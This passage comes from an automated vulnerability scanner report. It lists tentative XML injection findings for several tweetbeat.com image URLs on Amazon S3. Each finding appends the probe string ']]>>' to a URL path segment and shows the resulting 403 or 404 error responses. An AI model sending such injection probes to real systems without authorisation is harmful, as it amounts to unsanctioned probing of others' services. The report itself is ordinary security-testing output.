Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 34D40D599E142219
x-amz-id-2: c+EVB1wyuqT9LT0+9nJDwEsCUy199quWtu1K4HYlk4Axm3tRPiIESCOG+LMVw7iw
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:04 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>34D40D599E142219</RequestId><HostId>c+EVB1wyuqT9LT0+9nJDwEsCUy199quWtu1K4HYlk4Axm3tRPi
...[SNIP]...

8.24. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg]]>>?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CE14F74653148B63
x-amz-id-2: x44WSqKVIOGk92oM0ghAhLWph/XFUWmN8zdRUe2zJtH5D2fhGg6XHgC3TRIy8Btg
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:05 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CE14F74653148B63</RequestId><HostId>x44WSqKVIOGk92oM0ghAhLWph/XFUWmN8zdRUe2zJtH5D2fhGg
...[SNIP]...

8.25. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 675C018B90E83DEA
x-amz-id-2: qX+Ou5K40rmd2sfIDCwI6Om5pxCNWmDUi/9IVZa3WOFkL2D4nqLC8ln7zPMmd7+Q
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:09 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>675C018B9
...[SNIP]...

8.26. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 67C303817CA12F59
x-amz-id-2: Oa1ZuGuSi+CUGvEFUa2d3HEImSTOn6LNNcokOpcXa/jcwPtj8wYGpZEIzQiTI54/
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:11 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>67C303817CA12F59</RequestId><HostId>Oa1ZuGuSi+CUGvEFUa2d3HEImSTOn6LNNcokOpcXa/jcwPtj8w
...[SNIP]...

8.27. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17612]]>>/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1DC9E63BB64255C0
x-amz-id-2: JqDEzKWqbm5clNZ5/+mSk6fVkubJKK8+7cL4V25oD7R+2QxVRroDkIRyEMk59RnW
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1DC9E63BB64255C0</RequestId><HostId>JqDEzKWqbm5clNZ5/+mSk6fVkubJKK8+7cL4V25oD7R+2QxVRr
...[SNIP]...

8.28. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg]]>>?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 795615118156FA69
x-amz-id-2: oDq5NVp6wLnICEIs19bjnfB2bA7ld6SSlco+z/WA4Npsv6KykRs8IJkBnNc3omTe
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>795615118156FA69</RequestId><HostId>oDq5NVp6wLnICEIs19bjnfB2bA7ld6SSlco+z/WA4Npsv6KykR
...[SNIP]...

8.29. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17619/Morganza%20%20spillway.jpg?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 7E074A9965E30E2F
x-amz-id-2: 4ciSu5Qt+9M4FlVPy6lPN/sFliApYxWjYFu7jWDRK/1T9OO6VBwoYzzEmlnAhR9I
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:08 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>7E074A996
...[SNIP]...

8.30. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17619/Morganza%20%20spillway.jpg?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BBDF88B0F79F11B0
x-amz-id-2: ycc6cKjByjaZf6ImQV5ZNOJR9Yi94Pib5ZQ+Ogb6SK3F98wKEoKe+asZiaSSHjlg
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:11 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BBDF88B0F79F11B0</RequestId><HostId>ycc6cKjByjaZf6ImQV5ZNOJR9Yi94Pib5ZQ+Ogb6SK3F98wKEo
...[SNIP]...

8.31. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17619]]>>/Morganza%20%20spillway.jpg?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: EE516C16EAF5468A
x-amz-id-2: PUzYJu2LzZxrPE046BTPsq2RQo7H9sjQV9csFLUjLd0w9sY5M7dMFc7NusC7XUrh
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE516C16EAF5468A</RequestId><HostId>PUzYJu2LzZxrPE046BTPsq2RQo7H9sjQV9csFLUjLd0w9sY5M7
...[SNIP]...

8.32. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg]]>>?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 68208926DAEAC214
x-amz-id-2: OZNUXJqRcH9uUw/vSI7oqvbJ3VkG3IjbJy5UGFwztBe6IkqFyMiLD2zkOp4DqQju
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>68208926DAEAC214</RequestId><HostId>OZNUXJqRcH9uUw/vSI7oqvbJ3VkG3IjbJy5UGFwztBe6IkqFyM
...[SNIP]...

8.33. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17655/AP11051412618.jpg?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: BDBF654F74924D3C
x-amz-id-2: okBiAYqEksGNL0FGUHD1Rf8iRsV5ZXA/X3yEa4qjgoyirNVSdBcg5y8mzyxA4obu
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>BDBF654F7
...[SNIP]...

8.34. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17655/AP11051412618.jpg?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 3C475520989A1025
x-amz-id-2: WFuGv/mlw5ZxDc4HdmrV+ayKvREvVQDBpn4Y2lnimqscj9CT8inL0V59/NL6MTLJ
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3C475520989A1025</RequestId><HostId>WFuGv/mlw5ZxDc4HdmrV+ayKvREvVQDBpn4Y2lnimqscj9CT8i
...[SNIP]...

8.35. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17655]]>>/AP11051412618.jpg?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 112859293572DB01
x-amz-id-2: 2K5EeyoO7n+bYZ/5MObt5l7VyjtuWfmPz7rJOnKyelke3tqcskOz+7vpkJmujN8B
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>112859293572DB01</RequestId><HostId>2K5EeyoO7n+bYZ/5MObt5l7VyjtuWfmPz7rJOnKyelke3tqcsk
...[SNIP]...

8.36. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg]]>>?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BA6C0DD285592A5C
x-amz-id-2: UGO4ZocFHXMwysgVdHdTafcjPWTHg683Y0ynHCPuPzOxQkuPTy9SNG3nAU0hxdFZ
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA6C0DD285592A5C</RequestId><HostId>UGO4ZocFHXMwysgVdHdTafcjPWTHg683Y0ynHCPuPzOxQkuPTy
...[SNIP]...

8.37. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17656/AP110416146360.jpg?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: D86E046F30C98738
x-amz-id-2: qwwXq2c74gcwdsA2ma/vOy6Y7qeBBy1mtasgsCK7gSSazBxaYY5eYrLagNAZQviv
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>D86E046F3
...[SNIP]...

8.38. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17656/AP110416146360.jpg?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CF818E3299156252
x-amz-id-2: V7NTM6DsJj9JPNAAU+je+fWZMl9fNQe9HgRYgBOZh/anadtokEVXVrFwyTQyd83V
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:20 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CF818E3299156252</RequestId><HostId>V7NTM6DsJj9JPNAAU+je+fWZMl9fNQe9HgRYgBOZh/anadtokE
...[SNIP]...

8.39. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17656]]>>/AP110416146360.jpg?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: F7E76CE42E5F86AC
x-amz-id-2: T2ZYlxh5WzMb2z2pnmOt9lGxAhG/AfJzridTdN6/CDeauJui66BHsnD2pczjgvTc
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:21 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F7E76CE42E5F86AC</RequestId><HostId>T2ZYlxh5WzMb2z2pnmOt9lGxAhG/AfJzridTdN6/CDeauJui66
...[SNIP]...

8.40. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg]]>>?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: D7093B07B0F2B667
x-amz-id-2: wPFPLydDHKAzaG/GnfaPbXlNYJIs3ALIBRh0QSebHGWpQNrJUQmmIQHb+M+14o4f
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:24 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D7093B07B0F2B667</RequestId><HostId>wPFPLydDHKAzaG/GnfaPbXlNYJIs3ALIBRh0QSebHGWpQNrJUQ
...[SNIP]...

8.41. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17660/AP110429160259.jpg?1305423494 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
